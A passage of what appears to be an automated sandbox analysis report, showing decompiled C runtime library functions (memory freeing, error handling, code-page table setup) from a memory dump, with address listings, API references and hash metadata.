					if(_t103 >= 0) {
						_t93 = _t69;
					}
				}
				_t88 = _a32;
				if(_a32 == 0) {
					_t88 =  *((intOrPtr*)( *_a4 + 8));
					_a32 =  *((intOrPtr*)( *_a4 + 8));
				}
				_t86 = E0138C0C6(_t88, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t93, 0, 0);
				_t98 = _t97 + 0x18;
				_v12 = _t86;
				if(_t86 == 0) {
					L39:
					_pop(_t89);
					_pop(_t94);
					_pop(_t71);
					return E01377F14(_t46, _t71, _v8 ^ _t96, _t86, _t89, _t94);
				} else {
					_t17 = _t86 + _t86 + 8; // 0x8
					asm("sbb eax, eax");
					_t49 = _t86 + _t86 & _t17;
					if(_t49 == 0) {
						_t72 = 0;
						L15:
						if(_t72 == 0) {
							L37:
							_t95 = 0;
							L38:
							E01377CA5(_t72);
							_t46 = _t95;
							goto L39;
						}
						_t51 = E0138C0C6(_t88, 1, _a16, _t93, _t72, _t86);
						_t100 = _t98 + 0x18;
						if(_t51 == 0) {
							goto L37;
						}
						_t90 = _v12;
						_t53 = E013885E9(_a8, _a12, _t72, _v12, 0, 0, 0, 0, 0); // executed
						_t95 = _t53;
						if(_t95 == 0) {
							goto L37;
						}
						_t86 = 0x400;
						if((_a12 & 0x00000400) == 0) {
							_t31 = _t95 + _t95 + 8; // 0x8
							asm("sbb eax, eax");
							_t55 = _t95 + _t95 & _t31;
							if(_t55 == 0) {
								_t91 = 0;
								L31:
								if(_t91 == 0 || E013885E9(_a8, _a12, _t72, _v12, _t91, _t95, 0, 0, 0) == 0) {
									L36:
									E01377CA5(_t91);
									goto L37;
								} else {
									_push(0);
									_push(0);
									if(_a28 != 0) {
										_push(_a28);
										_push(_a24);
									} else {
										_push(0);
										_push(0);
									}
									_push(_t95);
									_push(_t91);
									_push(0);
									_push(_a32);
									_t95 = E0138C142();
									if(_t95 != 0) {
										E01377CA5(_t91);
										goto L38;
									} else {
										goto L36;
									}
								}
							}
							if(_t55 > 0x400) {
								_t91 = E0138871A(_t55);
								if(_t91 == 0) {
									goto L36;
								}
								 *_t91 = 0xdddd;
								L29:
								_t91 = _t91 + 8;
								goto L31;
							}
							E01378390(_t55);
							_t91 = _t100;
							if(_t91 == 0) {
								goto L36;
							}
							 *_t91 = 0xcccc;
							goto L29;
						}
						_t63 = _a28;
						if(_t63 == 0) {
							goto L38;
						}
						if(_t95 > _t63) {
							goto L37;
						}
						_t95 = E013885E9(_a8, _a12, _t72, _t90, _a24, _t63, 0, 0, 0);
						if(_t95 != 0) {
							goto L38;
						}
						goto L37;
					}
					if(_t49 > 0x400) {
						_t72 = E0138871A(_t49);
						if(_t72 == 0) {
							L13:
							_t86 = _v12;
							goto L15;
						}
						 *_t72 = 0xdddd;
						L12:
						_t72 = _t72 + 8;
						goto L13;
					}
					E01378390(_t49);
					_t72 = _t98;
					if(_t72 == 0) {
						goto L13;
					}
					 *_t72 = 0xcccc;
					goto L12;
				}
			}

0x01387d4f
0x01387d50
0x01387d51
0x01387d58
0x01387d5d
0x01387d63
0x01387d69
0x01387d6f
0x01387d72
0x01387d72
0x01387d75
0x01387d77
0x01387d77
0x01387d75
0x01387d79
0x01387d7e
0x01387d85
0x01387d88
0x01387d88
0x01387da9
0x01387dab
0x01387dae
0x01387db3
0x01387f11
0x01387f14
0x01387f15
0x01387f16
0x01387f22
0x01387db9
0x01387dbc
0x01387dc1
0x01387dc3
0x01387dc5
0x01387dfc
0x01387dfe
0x01387e00
0x01387f06
0x01387f06
0x01387f08
0x01387f09
0x01387f0f
0x00000000
0x01387f0f
0x01387e0f
0x01387e14
0x01387e19
0x00000000
0x00000000
0x01387e1f
0x01387e31
0x01387e36
0x01387e3a
0x00000000
0x00000000
0x01387e40
0x01387e48
0x01387e85
0x01387e8a
0x01387e8c
0x01387e8e
0x01387ebf
0x01387ec1
0x01387ec3
0x01387eff
0x01387f00
0x00000000
0x01387ee0
0x01387ee2
0x01387ee3
0x01387ee7
0x01387f23
0x01387f26
0x01387ee9
0x01387ee9
0x01387eea
0x01387eea
0x01387eeb
0x01387eec
0x01387eed
0x01387eee
0x01387ef6
0x01387efd
0x01387f2c
0x00000000
0x00000000
0x00000000
0x00000000
0x01387efd
0x01387ec3
0x01387e92
0x01387ead
0x01387eb2
0x00000000
0x00000000
0x01387eb4
0x01387eba
0x01387eba
0x00000000
0x01387eba
0x01387e94
0x01387e99
0x01387e9d
0x00000000
0x00000000
0x01387e9f
0x00000000
0x01387e9f
0x01387e4a
0x01387e4f
0x00000000
0x00000000
0x01387e57
0x00000000
0x00000000
0x01387e73
0x01387e77
0x00000000
0x00000000
0x00000000
0x01387e7d
0x01387dcc
0x01387de7
0x01387dec
0x01387df7
0x01387df7
0x00000000
0x01387df7
0x01387dee
0x01387df4
0x01387df4
0x00000000
0x01387df4
0x01387dce
0x01387dd3
0x01387dd7
0x00000000
0x00000000
0x01387dd9
0x00000000
0x01387dd9

APIs

__freea.LIBCMT ref: 01387F00

Part of subcall function 0138871A: RtlAllocateHeap.NTDLL(00000000,?,?,?,01378B75,?,?,?,?,?,01371221,?,?), ref: 0138874C

__freea.LIBCMT ref: 01387F09
__freea.LIBCMT ref: 01387F2C

Memory Dump Source

Source File: 00000002.00000002.281026800.0000000001371000.00000020.00000001.01000000.00000009.sdmp, Offset: 01370000, based on PE: true

Associated: 00000002.00000002.280939181.0000000001370000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.281545635.0000000001394000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.281900158.00000000013A3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.284995880.00000000014A4000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.285035285.00000000014A5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.285069288.00000000014A7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1370000_321.jbxd

Similarity

API ID: __freea$AllocateHeap
String ID:
API String ID: 2243444508-0
Opcode ID: c91e23f1c17ac98c25b4ee1ae4c266bf66d6bee08921b56fc474bdb7feb9904c
Instruction ID: 4dd1f980e2161253dc98048921e2df26f64d6d2c8601f40dead563e1730057e1
Opcode Fuzzy Hash: c91e23f1c17ac98c25b4ee1ae4c266bf66d6bee08921b56fc474bdb7feb9904c
Instruction Fuzzy Hash: B351B372600317ABEF21BF69CC40EBB7AAAEF94658F254159FE0497140E734DC5586A0

Uniqueness

Uniqueness Score: -1.00%

Function 01380475 Relevance: 4.6, APIs: 3, Instructions: 141
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 76%

			E01380475(void* __ebx, signed int __ecx, void* __edx, void* __edi, void* __esi, intOrPtr _a4) {
				intOrPtr _v0;
				char _v8;
				char _v12;
				signed int _v16;
				char _v20;
				signed int _v44;
				char _v80;
				char _v84;
				void* _v93;
				char _v100;
				char _v104;
				char* _v108;
				char _v112;
				void* __ebp;
				intOrPtr* _t70;
				signed int _t71;
				char _t72;
				void* _t75;
				signed int _t80;
				signed int _t84;
				signed int _t95;
				signed int _t106;
				signed int _t110;
				void* _t111;
				char _t116;
				void* _t120;
				signed int _t125;
				signed int _t126;
				void* _t129;
				signed int _t131;
				signed int _t133;
				signed int _t143;
				void* _t145;
				char _t155;
				intOrPtr* _t157;
				intOrPtr _t159;
				void* _t160;
				signed int _t163;
				void* _t167;
				void* _t169;
				void* _t170;
				void* _t171;

				_t153 = __edx;
				_push(__ebx);
				_push(__esi);
				_t163 = __ecx;
				_push(__edi);
				_push( *((intOrPtr*)( *((intOrPtr*)(__ecx + 4)))));
				_t70 =  *((intOrPtr*)(__ecx));
				_push( *_t70); // executed
				L21(); // executed
				_t157 = _t70;
				_pop(_t129);
				if(_t157 == 0) {
					L4:
					_t71 = 0;
					goto L5;
				} else {
					_t72 = E01385D71(_t129, __edx);
					_v12 = _t72;
					_t125 = 0;
					_v20 =  *((intOrPtr*)(_t72 + 0x4c));
					_t131 =  *(_t72 + 0x48);
					_v16 = _t131;
					_v8 = 0;
					_t75 = E01388CAA(0, _t131, __edx,  &_v8, 0, 0, _t157, 0,  &_v20);
					_t170 = _t169 + 0x18;
					if(_t75 == 0) {
						_t126 = E0138871A(_v8 + 4);
						__eflags = _t126;
						if(_t126 == 0) {
							goto L4;
						} else {
							_t131 =  &_v20;
							_t13 = _t126 + 4; // 0x4
							_t80 = E01388CAA(_t126, _t131, __edx, 0, _t13, _v8, _t157, 0xffffffff, _t131);
							_t170 = _t170 + 0x18;
							__eflags = _t80;
							if(_t80 == 0) {
								_t133 = _t131 | 0xffffffff;
								_t159 = _v20;
								_t16 = ( *((intOrPtr*)( *_t163)) +  *((intOrPtr*)( *_t163))) * 8; // 0x51d4e8
								__eflags =  *(_t159 + _t16 + 0x24);
								if(__eflags != 0) {
									asm("lock xadd [edx], eax");
									if(__eflags == 0) {
										_t19 = ( *((intOrPtr*)( *_t163)) +  *((intOrPtr*)( *_t163))) * 8; // 0x51d4e8
										E013871B2( *((intOrPtr*)(_t159 + _t19 + 0x24)));
										_pop(_t143);
										 *(_t159 + 0x24 + ( *((intOrPtr*)( *_t163)) +  *((intOrPtr*)( *_t163))) * 8) =  *(_t159 + 0x24 + ( *((intOrPtr*)( *_t163)) +  *((intOrPtr*)( *_t163))) * 8) & 0x00000000;
										_t133 = _t143 | 0xffffffff;
										__eflags = _t133;
									}
								}
								_t155 = _v12;
								_t84 =  *0x13a3280; // 0xfffffffe
								__eflags =  *(_t155 + 0x350) & _t84;
								if(( *(_t155 + 0x350) & _t84) == 0) {
									_t32 = ( *((intOrPtr*)( *_t163)) +  *((intOrPtr*)( *_t163))) * 8; // 0x51d4e8
									__eflags =  *(_t159 + _t32 + 0x24);
									if( *(_t159 + _t32 + 0x24) != 0) {
										asm("lock xadd [eax], ecx");
										__eflags = _t133 == 1;
										if(_t133 == 1) {
											_t35 = ( *((intOrPtr*)( *_t163)) +  *((intOrPtr*)( *_t163))) * 8; // 0x51d4e8
											E013871B2( *((intOrPtr*)(_t159 + _t35 + 0x24)));
											_t95 =  *((intOrPtr*)( *_t163)) +  *((intOrPtr*)( *_t163));
											_t37 = _t159 + 0x24 + _t95 * 8;
											 *_t37 =  *(_t159 + 0x24 + _t95 * 8) & 0x00000000;
											__eflags =  *_t37;
										}
									}
								}
								_t43 = _t159 + 0xc; // 0xb80775c0
								_t44 = _t126 + 4; // 0x4
								_t71 = _t44;
								 *_t126 =  *_t43;
								 *(_t159 + 0x24 + ( *((intOrPtr*)( *_t163)) +  *((intOrPtr*)( *_t163))) * 8) = _t126;
								 *((intOrPtr*)(_t159 + 0x1c + ( *((intOrPtr*)( *_t163)) +  *((intOrPtr*)( *_t163))) * 8)) = _t71;
								L5:
								return _t71;
							} else {
								__eflags = _t80 - 0x16;
								if(_t80 == 0x16) {
									L19:
									_t125 = 0;
									__eflags = 0;
									goto L20;
								} else {
									__eflags = _t80 - 0x22;
									if(_t80 == 0x22) {
										goto L19;
									} else {
										E013871B2(_t126);
										goto L4;
									}
								}
							}
						}
					} else {
						if(_t75 == 0x16 || _t75 == 0x22) {
							L20:
							_push(_t125);
							_push(_t125);
							_push(_t125);
							_push(_t125);
							_push(_t125);
							E0138016C();
							asm("int3");
							_t167 = _t170;
							_push(_t131);
							__eflags = _v44;
							if(_v44 != 0) {
								_push(_t163);
								_push(_t157);
								_t160 = 0;
								_t106 = E013889EB( &_v12, 0, 0, _a4, 0x7fffffff);
								_t171 = _t170 + 0x14;
								__eflags = _t106;
								if(_t106 == 0) {
									L26:
									_t163 = E013858A2(_v12, 2);
									_pop(_t145);
									__eflags = _t163;
									if(_t163 == 0) {
										L32:
										E013871B2(_t163);
										return _t160;
									} else {
										_t110 = E013889EB(_t160, _t163, _v12, _a4, 0xffffffff);
										_t171 = _t171 + 0x14;
										__eflags = _t110;
										if(_t110 == 0) {
											_t111 = E01383E4F(_t125, _t145, _t153, _t160, _t163, _v0, _t163); // executed
											_t160 = _t111;
											goto L32;
										} else {
											__eflags = _t110 - 0x16;
											if(_t110 == 0x16) {
												goto L33;
											} else {
												__eflags = _t110 - 0x22;
												if(_t110 == 0x22) {
													goto L33;
												} else {
													goto L32;
												}
											}
										}
									}
								} else {
									__eflags = _t106 - 0x16;
									if(_t106 == 0x16) {
										L33:
										_push(_t160);
										_push(_t160);
										_push(_t160);
										_push(_t160);
										_push(_t160);
										E0138016C();
										asm("int3");
										_push(_t167);
										E01388682();
										_v112 =  &_v84;
										_v108 =  &_v80;
										_t116 = 4;
										_v100 = _t116;
										_v104 = _t116;
										_push( &_v100);
										_push( &_v112);
										_push( &_v104); // executed
										_t120 = E0138041A(_t125, _t160, _t163, __eflags); // executed
										return _t120;
									} else {
										__eflags = _t106 - 0x22;
										if(_t106 == 0x22) {
											goto L33;
										} else {
											goto L26;
										}
									}
								}
							} else {
								return E01383E4F(_t125, _t131, _t153, _t157, _t163, _v0, 0);
							}
						} else {
							goto L4;
						}
					}
				}
			}

0x01380475
0x0138047d
0x0138047e
0x0138047f
0x01380481
0x01380485
0x01380487
0x01380489
0x0138048b
0x01380490
0x01380493
0x01380496
0x013804db
0x013804db
0x00000000
0x01380498
0x01380498
0x0138049d
0x013804a0
0x013804a5
0x013804a8
0x013804b5
0x013804ba
0x013804bd
0x013804c2
0x013804c7
0x013804ee
0x013804f1
0x013804f3
0x00000000
0x013804f5
0x013804f5
0x013804ff
0x01380505
0x0138050a
0x0138050d
0x0138050f
0x0138052e
0x01380531
0x01380538
0x0138053c
0x0138053e
0x01380542
0x01380546
0x0138054e
0x01380552
0x01380559
0x0138055e
0x01380563
0x01380563
0x01380563
0x01380546
0x01380566
0x01380569
0x0138056e
0x01380574
0x0138057c
0x01380580
0x01380582
0x01380584
0x01380588
0x01380589
0x01380591
0x01380595
0x0138059f
0x013805a1
0x013805a1
0x013805a1
0x013805a1
0x01380589
0x01380582
0x013805a6
0x013805a9
0x013805a9
0x013805ac
0x013805b4
0x013805be
0x013804dd
0x013804e1
0x01380511
0x01380511
0x01380514
0x013805c7
0x013805c7
0x013805c7
0x00000000
0x0138051a
0x0138051a
0x0138051d
0x00000000
0x01380523
0x01380524
0x00000000
0x01380529
0x0138051d
0x01380514
0x0138050f
0x013804c9
0x013804cc
0x013805c9
0x013805c9
0x013805ca
0x013805cb
0x013805cc
0x013805cd
0x013805ce
0x013805d3
0x013805d7
0x013805d9
0x013805da
0x013805de
0x013805ee
0x013805ef
0x013805f8
0x01380600
0x01380605
0x01380608
0x0138060a
0x01380616
0x01380620
0x01380623
0x01380624
0x01380626
0x01380657
0x01380658
0x01380663
0x01380628
0x01380632
0x01380637
0x0138063a
0x0138063c
0x0138064e
0x01380655
0x00000000
0x0138063e
0x0138063e
0x01380641
0x00000000
0x01380643
0x01380643
0x01380646
0x00000000
0x01380648
0x00000000
0x01380648
0x01380646
0x01380641
0x0138063c
0x0138060c
0x0138060c
0x0138060f
0x01380664
0x01380664
0x01380665
0x01380666
0x01380667
0x01380668
0x01380669
0x0138066e
0x01380671
0x01380677
0x0138067f
0x0138068a
0x0138068d
0x0138068e
0x01380691
0x01380697
0x0138069b
0x0138069f
0x013806a0
0x013806a6
0x01380611
0x01380611
0x01380614
0x00000000
0x00000000
0x00000000
0x00000000
0x01380614
0x0138060f
0x013805e0
0x013805ed
0x013805ed
0x00000000
0x00000000
0x00000000
0x013804cc
0x013804c7

APIs

Part of subcall function 01385D71: GetLastError.KERNEL32(?,00000000,?,0137D1A2,00000000,00000000,?,?,01388943,00000000,00000000,00000000,00000000,?), ref: 01385D76
Part of subcall function 01385D71: SetLastError.KERNEL32(00000000,00000002,000000FF,?,01388943,00000000,00000000,00000000,00000000,?), ref: 01385E14

_free.LIBCMT ref: 01380524
_free.LIBCMT ref: 01380552
_free.LIBCMT ref: 01380595

Memory Dump Source

Source File: 00000002.00000002.281026800.0000000001371000.00000020.00000001.01000000.00000009.sdmp, Offset: 01370000, based on PE: true

Associated: 00000002.00000002.280939181.0000000001370000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.281545635.0000000001394000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.281900158.00000000013A3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.284995880.00000000014A4000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.285035285.00000000014A5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.285069288.00000000014A7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1370000_321.jbxd

Similarity

API ID: _free$ErrorLast
String ID:
API String ID: 3291180501-0
Opcode ID: efff702b76b61c0504238b4662624f7088f373cdc199f3fc44b5367a9d66093c
Instruction ID: ce19750c12d2ecf802246ed99600680d162fb27aa89a6ec431e2717d6416ab76
Opcode Fuzzy Hash: efff702b76b61c0504238b4662624f7088f373cdc199f3fc44b5367a9d66093c
Instruction Fuzzy Hash: 66417E31604206DFDB68EFACC884A69B7F9FF48318B24066DF555D7391E731E8189B60

Uniqueness

Uniqueness Score: -1.00%

Function 013805D4 Relevance: 4.6, APIs: 3, Instructions: 96
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 72%

			E013805D4(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8) {
				char _v8;
				char _v28;
				char _v32;
				void* _v41;
				char _v48;
				char _v52;
				char* _v56;
				char _v60;
				void* __ebp;
				void* _t20;
				void* _t24;
				void* _t25;
				char _t30;
				void* _t34;
				void* _t39;
				void* _t46;
				void* _t48;
				void* _t54;
				void* _t55;

				_t50 = __esi;
				_t36 = __ebx;
				_push(__ecx);
				if(_a8 != 0) {
					_push(__esi);
					_push(__edi);
					_t48 = 0;
					_t20 = E013889EB( &_v8, 0, 0, _a8, 0x7fffffff);
					_t55 = _t54 + 0x14;
					__eflags = _t20;
					if(_t20 == 0) {
						L5:
						_t50 = E013858A2(_v8, 2);
						_pop(_t39);
						__eflags = _t50;
						if(_t50 == 0) {
							L11:
							E013871B2(_t50);
							return _t48;
						} else {
							_t24 = E013889EB(_t48, _t50, _v8, _a8, 0xffffffff);
							_t55 = _t55 + 0x14;
							__eflags = _t24;
							if(_t24 == 0) {
								_t25 = E01383E4F(_t36, _t39, _t46, _t48, _t50, _a4, _t50); // executed
								_t48 = _t25;
								goto L11;
							} else {
								__eflags = _t24 - 0x16;
								if(_t24 == 0x16) {
									goto L12;
								} else {
									__eflags = _t24 - 0x22;
									if(_t24 == 0x22) {
										goto L12;
									} else {
										goto L11;
									}
								}
							}
						}
					} else {
						__eflags = _t20 - 0x16;
						if(_t20 == 0x16) {
							L12:
							_push(_t48);
							_push(_t48);
							_push(_t48);
							_push(_t48);
							_push(_t48);
							E0138016C();
							asm("int3");
							E01388682();
							_v60 =  &_v32;
							_v56 =  &_v28;
							_t30 = 4;
							_v48 = _t30;
							_v52 = _t30;
							_push( &_v48);
							_push( &_v60);
							_push( &_v52); // executed
							_t34 = E0138041A(_t36, _t48, _t50, __eflags); // executed
							return _t34;
						} else {
							__eflags = _t20 - 0x22;
							if(_t20 == 0x22) {
								goto L12;
							} else {
								goto L5;
							}
						}
					}
				} else {
					return E01383E4F(__ebx, __ecx, _t46, __edi, __esi, _a4, 0);
				}
			}

0x013805d4
0x013805d4
0x013805d9
0x013805de
0x013805ee
0x013805ef
0x013805f8
0x01380600
0x01380605
0x01380608
0x0138060a
0x01380616
0x01380620
0x01380623
0x01380624
0x01380626
0x01380657
0x01380658
0x01380663
0x01380628
0x01380632
0x01380637
0x0138063a
0x0138063c
0x0138064e
0x01380655
0x00000000
0x0138063e
0x0138063e
0x01380641
0x00000000
0x01380643
0x01380643
0x01380646
0x00000000
0x01380648
0x00000000
0x01380648
0x01380646
0x01380641
0x0138063c
0x0138060c
0x0138060c
0x0138060f
0x01380664
0x01380664
0x01380665
0x01380666
0x01380667
0x01380668
0x01380669
0x0138066e
0x01380677
0x0138067f
0x0138068a
0x0138068d
0x0138068e
0x01380691
0x01380697
0x0138069b
0x0138069f
0x013806a0
0x013806a6
0x01380611
0x01380611
0x01380614
0x00000000
0x00000000
0x00000000
0x00000000
0x01380614
0x0138060f
0x013805e0
0x013805ed
0x013805ed

APIs

__cftoe.LIBCMT ref: 01380600
__cftoe.LIBCMT ref: 01380632
_free.LIBCMT ref: 01380658

Memory Dump Source

Source File: 00000002.00000002.281026800.0000000001371000.00000020.00000001.01000000.00000009.sdmp, Offset: 01370000, based on PE: true

Associated: 00000002.00000002.280939181.0000000001370000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.281545635.0000000001394000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.281900158.00000000013A3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.284995880.00000000014A4000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.285035285.00000000014A5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.285069288.00000000014A7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1370000_321.jbxd

Similarity

API ID: __cftoe$_free
String ID:
API String ID: 1303422935-0
Opcode ID: 19ffaf41f71fcc14494c5dd2a69315e07d9690aa0d8d29b8391ad6d17b9d068f
Instruction ID: 91c73749a1a81cf031134c98b40a98b788f2f678879fa90ff2b15de6225fb0f4
Opcode Fuzzy Hash: 19ffaf41f71fcc14494c5dd2a69315e07d9690aa0d8d29b8391ad6d17b9d068f
Instruction Fuzzy Hash: 3821B572804309BADF25BB9D9C05DDF3FA9DF85638F204166F915E5180DB30C6488661

Uniqueness

Uniqueness Score: -1.00%

Function 0138CF2D Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 126
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E0138CF2D(signed int __edx, intOrPtr _a4) {
				signed int _v8;
				char _v264;
				char _v520;
				char _v776;
				char _v1800;
				char _v1814;
				struct _cpinfo _v1820;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t60;
				signed int _t63;
				char _t68;
				signed char _t69;
				signed int _t70;
				signed int _t80;
				signed int _t81;
				char _t82;
				signed int _t85;
				signed char _t86;
				signed int _t87;
				signed int _t88;
				void* _t89;
				intOrPtr _t90;
				signed int _t91;

				_t88 = __edx;
				_t60 =  *0x13a3014; // 0x98b2b77b
				_v8 = _t60 ^ _t91;
				_t90 = _a4;
				if( *(_t90 + 4) == 0xfde9) {
					L19:
					_t81 = 0;
					__eflags = 0;
					_t89 = 0x100;
					_t82 = 0;
					do {
						_t46 = _t82 - 0x61; // -97
						_t88 = _t46;
						_t47 = _t88 + 0x20; // -65
						__eflags = _t47 - 0x19;
						if(_t47 > 0x19) {
							__eflags = _t88 - 0x19;
							if(_t88 > 0x19) {
								_t63 = _t81;
							} else {
								 *(_t90 + _t82 + 0x19) =  *(_t90 + _t82 + 0x19) | 0x00000020;
								_t56 = _t82 - 0x20; // -32
								_t63 = _t56;
							}
						} else {
							 *(_t90 + _t82 + 0x19) =  *(_t90 + _t82 + 0x19) | 0x00000010;
							_t52 = _t82 + 0x20; // 0x20
							_t63 = _t52;
						}
						 *(_t90 + _t82 + 0x119) = _t63;
						_t82 = _t82 + 1;
						__eflags = _t82 - _t89;
					} while (_t82 < _t89);
					L26:
					return E01377F14(_t63, _t81, _v8 ^ _t91, _t88, _t89, _t90);
				}
				_t5 = _t90 + 4; // 0xe8458d00
				if(GetCPInfo( *_t5,  &_v1820) == 0) {
					goto L19;
				} else {
					_t81 = 0;
					_t89 = 0x100;
					_t68 = 0;
					do {
						 *((char*)(_t91 + _t68 - 0x104)) = _t68;
						_t68 = _t68 + 1;
					} while (_t68 < 0x100);
					_t69 = _v1814;
					_t85 =  &_v1814;
					_v264 = 0x20;
					while(1) {
						_t99 = _t69;
						if(_t69 == 0) {
							break;
						}
						_t88 =  *(_t85 + 1) & 0x000000ff;
						_t70 = _t69 & 0x000000ff;
						while(1) {
							__eflags = _t70 - _t88;
							if(_t70 > _t88) {
								break;
							}
							__eflags = _t70 - _t89;
							if(_t70 >= _t89) {
								break;
							}
							 *((char*)(_t91 + _t70 - 0x104)) = 0x20;
							_t70 = _t70 + 1;
							__eflags = _t70;
						}
						_t85 = _t85 + 2;
						__eflags = _t85;
						_t69 =  *_t85;
					}
					_t14 = _t90 + 4; // 0xe8458d00
					E0138B3FB(_t99, _t81, 1,  &_v264, _t89,  &_v1800,  *_t14, _t81);
					_t17 = _t90 + 4; // 0xe8458d00
					_t20 = _t90 + 0x21c; // 0xffffffac
					E01387F34(_t99, _t81,  *_t20, _t89,  &_v264, _t89,  &_v520, _t89,  *_t17, _t81); // executed
					_t22 = _t90 + 4; // 0xe8458d00
					_t24 = _t90 + 0x21c; // 0xffffffac
					E01387F34(_t99, _t81,  *_t24, 0x200,  &_v264, _t89,  &_v776, _t89,  *_t22, _t81);
					_t80 = _t81;
					do {
						_t86 =  *(_t91 + _t80 * 2 - 0x704) & 0x0000ffff;
						if((_t86 & 0x00000001) == 0) {
							__eflags = _t86 & 0x00000002;
							if((_t86 & 0x00000002) == 0) {
								_t87 = _t81;
							} else {
								 *(_t90 + _t80 + 0x19) =  *(_t90 + _t80 + 0x19) | 0x00000020;
								_t87 =  *((intOrPtr*)(_t91 + _t80 - 0x304));
							}
						} else {
							 *(_t90 + _t80 + 0x19) =  *(_t90 + _t80 + 0x19) | 0x00000010;
							_t87 =  *((intOrPtr*)(_t91 + _t80 - 0x204));
						}
						 *(_t90 + _t80 + 0x119) = _t87;
						_t80 = _t80 + 1;
					} while (_t80 < _t89);
					goto L26;
				}
			}

0x0138cf2d
0x0138cf38
0x0138cf3f
0x0138cf44
0x0138cf4f
0x0138d061
0x0138d061
0x0138d061
0x0138d063
0x0138d068
0x0138d06a
0x0138d06a
0x0138d06a
0x0138d06d
0x0138d070
0x0138d073
0x0138d07f
0x0138d082
0x0138d090
0x0138d084
0x0138d087
0x0138d08b
0x0138d08b
0x0138d08b
0x0138d075
0x0138d075
0x0138d07a
0x0138d07a
0x0138d07a
0x0138d092
0x0138d099
0x0138d09a
0x0138d09a
0x0138d09e
0x0138d0ac
0x0138d0ac
0x0138cf5c
0x0138cf67
0x00000000
0x0138cf6d
0x0138cf6d
0x0138cf6f
0x0138cf74
0x0138cf76
0x0138cf76
0x0138cf7d
0x0138cf7e
0x0138cf82
0x0138cf88
0x0138cf8e
0x0138cfb6
0x0138cfb6
0x0138cfb8
0x00000000
0x00000000
0x0138cf97
0x0138cf9b
0x0138cfad
0x0138cfad
0x0138cfaf
0x00000000
0x00000000
0x0138cfa0
0x0138cfa2
0x00000000
0x00000000
0x0138cfa4
0x0138cfac
0x0138cfac
0x0138cfac
0x0138cfb1
0x0138cfb1
0x0138cfb4
0x0138cfb4
0x0138cfbb
0x0138cfd0
0x0138cfd6
0x0138cfea
0x0138cff1
0x0138d000
0x0138d012
0x0138d019
0x0138d021
0x0138d023
0x0138d023
0x0138d02e
0x0138d03e
0x0138d041
0x0138d051
0x0138d043
0x0138d043
0x0138d048
0x0138d048
0x0138d030
0x0138d030
0x0138d035
0x0138d035
0x0138d053
0x0138d05a
0x0138d05b
0x00000000
0x0138d05f

APIs

GetCPInfo.KERNEL32(E8458D00,?,0000000C,00000000,00000000), ref: 0138CF5F

Strings

, xrefs: 0138CFA4

Memory Dump Source

Source File: 00000002.00000002.281026800.0000000001371000.00000020.00000001.01000000.00000009.sdmp, Offset: 01370000, based on PE: true

Associated: 00000002.00000002.280939181.0000000001370000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.281545635.0000000001394000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.281900158.00000000013A3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.284995880.00000000014A4000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.285035285.00000000014A5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.285069288.00000000014A7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1370000_321.jbxd

Similarity

API ID: Info
String ID:
API String ID: 1807457897-3916222277
Opcode ID: 98e9b900f28f28ea788e36d2e22df33fe8d7151038c1ec6753904b5f8dfdf5d5
Instruction ID: 3ac4372b57dcd4bb21beb40934a35743be68e82227f2cdb0976bf7f170ea92dd
Opcode Fuzzy Hash: 98e9b900f28f28ea788e36d2e22df33fe8d7151038c1ec6753904b5f8dfdf5d5
Instruction Fuzzy Hash: 06415EB050434C5FE7219B68CD84BFABBFDEB4570CF2404ADE5C687182D271994ACB61

Uniqueness

Uniqueness Score: -1.00%

Function 0138D2BC Relevance: 3.2, APIs: 2, Instructions: 166
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 92%

			E0138D2BC(void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				char _v22;
				struct _cpinfo _v28;
				signed int _v32;
				signed int _v36;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t51;
				signed int _t55;
				int _t57;
				signed int _t60;
				signed int _t61;
				short _t64;
				signed char _t66;
				signed int _t67;
				signed char* _t75;
				signed char* _t76;
				int _t78;
				signed int _t83;
				signed char* _t84;
				short* _t85;
				signed int _t86;
